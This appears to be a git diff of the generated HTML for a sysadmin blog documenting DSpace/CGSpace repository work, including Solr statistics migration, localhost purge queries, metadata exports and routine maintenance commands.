506,070 Item View
116,153 Community View
33,282 Collection View
21,062 Community Search
10,788 Collection Search
52,107 Unexpected Type &amp; Full Site
--------------------------------------
1,730,378 TOTAL
=================================================================
</code></pre></div><p>Summary of stats after processing:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2015
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>=================================================================
</span></span><span style="display:flex;"><span> *** Statistics Records with Legacy Id ***
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span> 990,916 Bistream View
</span></span><span style="display:flex;"><span> 506,070 Item View
</span></span><span style="display:flex;"><span> 116,153 Community View
</span></span><span style="display:flex;"><span> 33,282 Collection View
</span></span><span style="display:flex;"><span> 21,062 Community Search
</span></span><span style="display:flex;"><span> 10,788 Collection Search
</span></span><span style="display:flex;"><span> 52,107 Unexpected Type &amp; Full Site
</span></span><span style="display:flex;"><span> --------------------------------------
</span></span><span style="display:flex;"><span> 1,730,378 TOTAL
</span></span><span style="display:flex;"><span>=================================================================
</span></span></code></pre></div><p>Summary of stats after processing:</p>
<ul>
<li>195,293: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
<li>67,146: <code>id:/.+-unmigrated/</code></li>
<li>262,439: <code>*:* NOT id:/.{36}/</code></li>
<li>247,400 are <code>type: 5</code> (SITE) so we can purge them:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2015/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><h2 id="statistics-2014">statistics-2014</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2015/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><h2 id="statistics-2014">statistics-2014</h2>
<p>Processing the statistics-2014 core:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2014
...
=================================================================
*** Statistics Records with Legacy Id ***
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span> 2,381,603 Item View
1,323,357 Bistream View
501,545 Community View
247,805 Collection View
250 Collection Search
188 Community Search
50 Item Search
10,918 Unexpected Type &amp; Full Site
--------------------------------------
4,465,716 TOTAL
=================================================================
</code></pre></div><p>Summary of unmigrated documents after processing:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2014
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>=================================================================
</span></span><span style="display:flex;"><span> *** Statistics Records with Legacy Id ***
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span> 2,381,603 Item View
</span></span><span style="display:flex;"><span> 1,323,357 Bistream View
</span></span><span style="display:flex;"><span> 501,545 Community View
</span></span><span style="display:flex;"><span> 247,805 Collection View
</span></span><span style="display:flex;"><span> 250 Collection Search
</span></span><span style="display:flex;"><span> 188 Community Search
</span></span><span style="display:flex;"><span> 50 Item Search
</span></span><span style="display:flex;"><span> 10,918 Unexpected Type &amp; Full Site
</span></span><span style="display:flex;"><span> --------------------------------------
</span></span><span style="display:flex;"><span> 4,465,716 TOTAL
</span></span><span style="display:flex;"><span>=================================================================
</span></span></code></pre></div><p>Summary of unmigrated documents after processing:</p>
<ul>
<li>182,131: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
<li>39,947: <code>id:/.+-unmigrated/</code></li>
<li>222,078: <code>*:* NOT id:/.{36}/</code></li>
<li>188,791 are <code>type: 5</code> (SITE) so we can purge them:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2014/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><h2 id="statistics-2013">statistics-2013</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2014/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><h2 id="statistics-2013">statistics-2013</h2>
<p>Processing the statistics-2013 core:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2013
...
=================================================================
*** Statistics Records with Legacy Id ***
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span> 2,352,124 Item View
1,117,676 Bistream View
575,711 Community View
171,639 Collection View
248 Item Search
7 Collection Search
5 Community Search
1,452 Unexpected Type &amp; Full Site
--------------------------------------
4,218,862 TOTAL
=================================================================
</code></pre></div><p>Summary of unmigrated docs after processing:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2013
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>=================================================================
</span></span><span style="display:flex;"><span> *** Statistics Records with Legacy Id ***
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span> 2,352,124 Item View
</span></span><span style="display:flex;"><span> 1,117,676 Bistream View
</span></span><span style="display:flex;"><span> 575,711 Community View
</span></span><span style="display:flex;"><span> 171,639 Collection View
</span></span><span style="display:flex;"><span> 248 Item Search
</span></span><span style="display:flex;"><span> 7 Collection Search
</span></span><span style="display:flex;"><span> 5 Community Search
</span></span><span style="display:flex;"><span> 1,452 Unexpected Type &amp; Full Site
</span></span><span style="display:flex;"><span> --------------------------------------
</span></span><span style="display:flex;"><span> 4,218,862 TOTAL
</span></span><span style="display:flex;"><span>=================================================================
</span></span></code></pre></div><p>Summary of unmigrated docs after processing:</p>
<ul>
<li>2,548 : <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
<li>29,772: <code>id:/.+-unmigrated/</code></li>
<li>32,320: <code>*:* NOT id:/.{36}/</code></li>
<li>15,691 are <code>type: 5</code> (SITE) so we can purge them:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2013/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><h2 id="statistics-2012">statistics-2012</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2013/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><h2 id="statistics-2012">statistics-2012</h2>
<p>Processing the statistics-2012 core:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2012
...
=================================================================
*** Statistics Records with Legacy Id ***
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span> 2,229,332 Item View
913,577 Bistream View
215,577 Collection View
104,734 Community View
--------------------------------------
3,463,220 TOTAL
=================================================================
</code></pre></div><p>Summary of unmigrated docs after processing:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2012
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>=================================================================
</span></span><span style="display:flex;"><span> *** Statistics Records with Legacy Id ***
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span> 2,229,332 Item View
</span></span><span style="display:flex;"><span> 913,577 Bistream View
</span></span><span style="display:flex;"><span> 215,577 Collection View
</span></span><span style="display:flex;"><span> 104,734 Community View
</span></span><span style="display:flex;"><span> --------------------------------------
</span></span><span style="display:flex;"><span> 3,463,220 TOTAL
</span></span><span style="display:flex;"><span>=================================================================
</span></span></code></pre></div><p>Summary of unmigrated docs after processing:</p>
<ul>
<li>0: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
<li>33,161: <code>id:/.+-unmigrated/</code></li>
<li>33,161: <code>*:* NOT id:/.{36}/</code></li>
<li>33,161 are <code>type: 3</code> (COLLECTION), which is different than I&rsquo;ve seen previously&hellip; but I suppose I still have to purge them because there will be errors in the Atmire modules otherwise:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2012/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><h2 id="statistics-2011">statistics-2011</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2012/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><h2 id="statistics-2011">statistics-2011</h2>
<p>Processing the statistics-2011 core:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2011
...
=================================================================
*** Statistics Records with Legacy Id ***
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span> 904,896 Item View
385,789 Bistream View
154,356 Collection View
62,978 Community View
--------------------------------------
1,508,019 TOTAL
=================================================================
</code></pre></div><p>Summary of unmigrated docs after processing:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2011
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>=================================================================
</span></span><span style="display:flex;"><span> *** Statistics Records with Legacy Id ***
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span> 904,896 Item View
</span></span><span style="display:flex;"><span> 385,789 Bistream View
</span></span><span style="display:flex;"><span> 154,356 Collection View
</span></span><span style="display:flex;"><span> 62,978 Community View
</span></span><span style="display:flex;"><span> --------------------------------------
</span></span><span style="display:flex;"><span> 1,508,019 TOTAL
</span></span><span style="display:flex;"><span>=================================================================
</span></span></code></pre></div><p>Summary of unmigrated docs after processing:</p>
<ul>
<li>0: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
<li>17,551: <code>id:/.+-unmigrated/</code></li>
<li>17,551: <code>*:* NOT id:/.{36}/</code></li>
<li>12,116 are <code>type: 3</code> (COLLECTION), which is different than I&rsquo;ve seen previously&hellip; but I suppose I still have to purge them because there will be errors in the Atmire modules otherwise:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2011/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><h2 id="statistics-2010">statistics-2010</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2011/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><h2 id="statistics-2010">statistics-2010</h2>
<p>Processing the statistics-2010 core:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2010
...
=================================================================
*** Statistics Records with Legacy Id ***
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span> 26,067 Item View
15,615 Bistream View
4,116 Collection View
1,094 Community View
--------------------------------------
46,892 TOTAL
=================================================================
</code></pre></div><p>Summary of unmigrated docs after processing:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace solr-upgrade-statistics-6x -n <span style="color:#ae81ff">2500000</span> -i statistics-2010
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>=================================================================
</span></span><span style="display:flex;"><span> *** Statistics Records with Legacy Id ***
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span> 26,067 Item View
</span></span><span style="display:flex;"><span> 15,615 Bistream View
</span></span><span style="display:flex;"><span> 4,116 Collection View
</span></span><span style="display:flex;"><span> 1,094 Community View
</span></span><span style="display:flex;"><span> --------------------------------------
</span></span><span style="display:flex;"><span> 46,892 TOTAL
</span></span><span style="display:flex;"><span>=================================================================
</span></span></code></pre></div><p>Summary of unmigrated docs after processing:</p>
<ul>
<li>0: <code>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</code></li>
<li>1,012: <code>id:/.+-unmigrated/</code></li>
<li>1,012: <code>*:* NOT id:/.{36}/</code></li>
<li>654 are <code>type: 3</code> (COLLECTION), which is different than I&rsquo;ve seen previously&hellip; but I suppose I still have to purge them because there will be errors in the Atmire modules otherwise:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2010/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</code></pre></div><h3 id="processing-solr-statistics-with-atomicstatisticsupdatecli">Processing Solr statistics with AtomicStatisticsUpdateCLI</h3>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#34;http://localhost:8081/solr/statistics-2010/update?softCommit=true&#34;</span> -H <span style="color:#e6db74">&#34;Content-Type: text/xml&#34;</span> --data-binary <span style="color:#e6db74">&#34;&lt;delete&gt;&lt;query&gt;*:* NOT id:/.{36}/&lt;/query&gt;&lt;/delete&gt;&#34;</span>
</span></span></code></pre></div><h3 id="processing-solr-statistics-with-atomicstatisticsupdatecli">Processing Solr statistics with AtomicStatisticsUpdateCLI</h3>
<p>On 2020-11-18 I finished processing the Solr statistics with solr-upgrade-statistics-6x and I started processing them with AtomicStatisticsUpdateCLI.</p>
<h2 id="statistics-1">statistics</h2>
<p>First the current year&rsquo;s statistics core, in 12-hour batches:</p>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -109,11 +109,11 @@
<ul>
<li>Send Gaia the last batch of potential duplicates for items 701 to 980:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
</code></pre></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv
</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv
</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
</span></span></code></pre></div>
<a href='https://alanorth.github.io/cgspace-notes/2022-03/'>Read more →</a>
</article>
@ -185,13 +185,13 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
<li>Atmire merged some changes I had submitted to the COUNTER-Robots project</li>
<li>I updated our local spider user agents and then re-ran the list with my <code>check-spider-hits.sh</code> script on CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-hits.sh -f /tmp/agents -p
Purging 1989 hits from The Knowledge AI in statistics
Purging 1235 hits from MaCoCu in statistics
Purging 455 hits from WhatsApp in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679
</code></pre></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f /tmp/agents -p
</span></span><span style="display:flex;"><span>Purging 1989 hits from The Knowledge AI in statistics
</span></span><span style="display:flex;"><span>Purging 1235 hits from MaCoCu in statistics
</span></span><span style="display:flex;"><span>Purging 455 hits from WhatsApp in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679
</span></span></code></pre></div>
<a href='https://alanorth.github.io/cgspace-notes/2021-12/'>Read more →</a>
</article>
@ -214,9 +214,9 @@ Purging 455 hits from WhatsApp in statistics
<li>I experimented with manually sharding the Solr statistics on DSpace Test</li>
<li>First I exported all the 2019 stats from CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid
$ zstd statistics-2019.json
</code></pre></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid
</span></span><span style="display:flex;"><span>$ zstd statistics-2019.json
</span></span></code></pre></div>
<a href='https://alanorth.github.io/cgspace-notes/2021-11/'>Read more →</a>
</article>
@ -238,15 +238,15 @@ $ zstd statistics-2019.json
<ul>
<li>Export all affiliations on CGSpace and run them against the latest RoR data dump:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt
$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
ations-matching.csv
$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l
1879
$ wc -l /tmp/2021-10-01-affiliations.txt
7100 /tmp/2021-10-01-affiliations.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt
</span></span><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
</span></span><span style="display:flex;"><span>ations-matching.csv
</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l
</span></span><span style="display:flex;"><span>1879
</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-10-01-affiliations.txt
</span></span><span style="display:flex;"><span>7100 /tmp/2021-10-01-affiliations.txt
</span></span></code></pre></div><ul>
<li>So we have 1879/7100 (26.46%) matching already</li>
</ul>
<a href='https://alanorth.github.io/cgspace-notes/2021-10/'>Read more →</a>
@ -303,8 +303,8 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
<ul>
<li>Update Docker images on AReS server (linode20) and reboot the server:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
</span></span></code></pre></div><ul>
<li>I decided to upgrade linode20 from Ubuntu 18.04 to 20.04</li>
</ul>
<a href='https://alanorth.github.io/cgspace-notes/2021-08/'>Read more →</a>
@ -328,9 +328,9 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
<ul>
<li>Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
COPY 20994
